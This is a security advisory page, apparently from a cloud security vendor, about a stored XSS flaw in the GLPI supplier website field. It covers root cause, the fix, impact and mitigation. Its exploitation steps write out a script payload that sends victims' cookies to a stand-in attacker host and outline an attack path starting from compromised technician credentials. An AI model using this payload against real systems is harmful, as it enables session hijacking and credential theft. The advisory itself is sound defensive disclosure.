CVE-2026-55214: 
GLPI vulnerability analysis and mitigation

Overview

CVE-2026-55214 is a stored cross-site scripting (XSS) vulnerability in GLPI, a free open-source IT asset management platform. An authenticated technician can inject malicious markup into supplier website fields; the payload executes in the browser of any user who subsequently opens the affected item's suppliers list. The vulnerability affects GLPI versions 11.0.6 through 11.0.7 (i.e., >= 11.0.6, < 11.0.8) and was disclosed on July 27, 2026, with a fix released in version 11.0.8. It carries a CVSS v4.0 base score of 8.5 (High) (GitHub Advisory, GLPI Release).

Technical details

The root cause is improper encoding or escaping of output (CWE-116): in src/Contact_Supplier.php and src/Contract_Supplier.php, the supplier website field value was rendered directly into HTML without applying htmlescape() when the field contained no URL (i.e., when the website URL was an empty string), allowing raw markup to pass through to the page. The fix, applied in commit 970786e, adds htmlescape() to the else branch so that the raw field value is always HTML-encoded before rendering (GitHub Commit). Exploitation requires an authenticated account with technician-level privileges to write to supplier records, and victim interaction (opening the suppliers list) to trigger the payload (GitHub Advisory).

Impact

Successful exploitation allows the injected JavaScript to execute in the security context of any GLPI user who views the suppliers list, enabling session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. Because the payload persists in the database and fires for every user who loads the affected view, a single malicious technician account can broadly impact all users — including administrators — who access supplier records. Confidentiality, integrity, and availability of the vulnerable system are all rated High in the CVSS v4.0 assessment (GitHub Advisory).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.0028 (0.28%), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is limited by the requirement for an authenticated technician account, reducing the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Obtain technician credentials: Acquire or compromise a GLPI account with technician-level privileges that has write access to supplier records (e.g., via phishing, credential stuffing, or insider access).
  2. Navigate to supplier management: Log in to the GLPI instance and navigate to the Suppliers section (Management > Suppliers).
  3. Inject XSS payload: Create or edit a supplier record and enter a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the Website field, leaving it as a non-URL value so the vulnerable code path (missing htmlescape()) is triggered.
  4. Save the record: Submit the form to persist the malicious payload in the GLPI database.
  5. Wait for victim interaction: Any GLPI user (including administrators) who opens the suppliers list or the affected item's supplier view will have the payload execute in their browser.
  6. Harvest results: Collect exfiltrated session cookies or credentials from the attacker-controlled server, then use them to hijack victim sessions or escalate privileges (GitHub Advisory, GitHub Commit).

Indicators of compromise

  • Logs: GLPI application or web server access logs showing POST requests to supplier create/edit endpoints (e.g., /front/supplier.form.php) containing HTML or JavaScript tags (<script>, onerror=, javascript:) in the website parameter.
  • Database: Supplier records in the GLPI database (glpi_suppliers table, website column) containing raw HTML or JavaScript markup rather than a valid URL.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after users access the GLPI suppliers list — particularly requests carrying cookie or session data as query parameters.
  • Browser/Proxy: Web proxy or endpoint detection logs showing GET requests to attacker-controlled infrastructure (e.g., attacker.com/steal?c=<session_token>) originating from GLPI users' browsers.

Mitigation and workarounds

The primary remediation is to upgrade GLPI to version 11.0.8 or later, which applies htmlescape() to the supplier website field in both Contact_Supplier.php and Contract_Supplier.php (GLPI Release, GitHub Commit). As a temporary workaround prior to patching, restrict technician-role permissions to prevent modification of supplier website fields, and deploy a web application firewall (WAF) rule to detect and block HTML/JavaScript content in supplier form submissions. Organizations should also audit existing supplier records for malicious content in the website field.

Community reactions

The GLPI project team published the security advisory (GHSA-8v8p-w8mq-wqcg) on July 27, 2026, and included the fix in the 11.0.8 security release, which addressed 16 CVEs in total — including two critical-severity issues — making it a significant security update (GLPI Release). The release received positive community engagement on GitHub (19 reactions). No notable independent researcher commentary or broader media coverage specific to CVE-2026-55214 has been identified.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Ubuntu

Unknown

xenial (esm-apps-legacy)

glpi

Unknown

Source: This report was generated using AI

Related GLPI vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55214HIGH8.5
  • GLPI logoGLPI
  • cpe:2.3:a:glpi-project:glpi
NoYesSep 25, 2026
CVE-2026-53629HIGH7.1
  • GLPI logoGLPI
  • cpe:2.3:a:glpi-project:glpi
NoYesSep 25, 2026
CVE-2026-53627MEDIUM6
  • GLPI logoGLPI
  • cpe:2.3:a:glpi-project:glpi
NoYesSep 25, 2026
CVE-2026-53628MEDIUM5.9
  • GLPI logoGLPI
  • cpe:2.3:a:glpi-project:glpi
NoYesSep 25, 2026
CVE-2026-55217MEDIUM5.3
  • GLPI logoGLPI
  • cpe:2.3:a:glpi-project:glpi
NoYesSep 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management